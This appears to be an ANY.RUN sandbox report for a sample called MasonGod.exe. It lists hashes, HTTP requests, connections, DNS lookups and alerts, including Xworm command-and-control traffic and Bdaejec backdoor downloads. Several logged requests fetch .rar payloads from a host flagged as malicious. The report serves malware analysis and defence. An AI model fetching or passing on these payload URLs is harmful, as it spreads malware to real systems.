SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
340powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_v4uojygl.thn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
30
DNS requests
17
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6632
iyMbXS.exe
GET
3.229.117.57:799
http://ddos.dnsnb8.net:799/cj//k2.rar
unknown
malicious
6632
iyMbXS.exe
GET
3.229.117.57:799
http://ddos.dnsnb8.net:799/cj//k1.rar
unknown
malicious
2040
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2040
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.16.168.114:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
4.213.25.241:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6544
svchost.exe
40.126.32.76:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.168.114
  • 2.16.168.124
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
google.com
  • 142.250.186.46
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
client.wns.windows.com
  • 4.213.25.241
whitelisted
login.live.com
  • 40.126.32.76
  • 20.190.160.128
  • 20.190.160.4
  • 40.126.32.72
  • 40.126.32.136
  • 20.190.160.20
  • 40.126.32.74
  • 40.126.32.140
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted
ddos.dnsnb8.net
  • 3.229.117.57
malicious

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Domain previously seen in multiple payload deliveries (ddos .dnsnb8 .net)
2196
svchost.exe
A Network Trojan was detected
MALWARE [ANY.RUN] Suspected domain Associated with Malware Distribution (.ply .gg)
2196
svchost.exe
Misc activity
ET TA_ABUSED_SERVICES Tunneling Service in DNS Lookup (* .ply .gg)
2196
svchost.exe
Potentially Bad Traffic
ET INFO playit .gg Tunneling Domain in DNS Lookup
6760
x69s.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Initial Packet
6760
x69s.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Initial Packet
6632
iyMbXS.exe
A Network Trojan was detected
BACKDOOR [ANY.RUN] Bdaejec Backdoor (download .rar)
6632
iyMbXS.exe
A Network Trojan was detected
BACKDOOR [ANY.RUN] Bdaejec Backdoor (download .rar)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
MasonGod.exe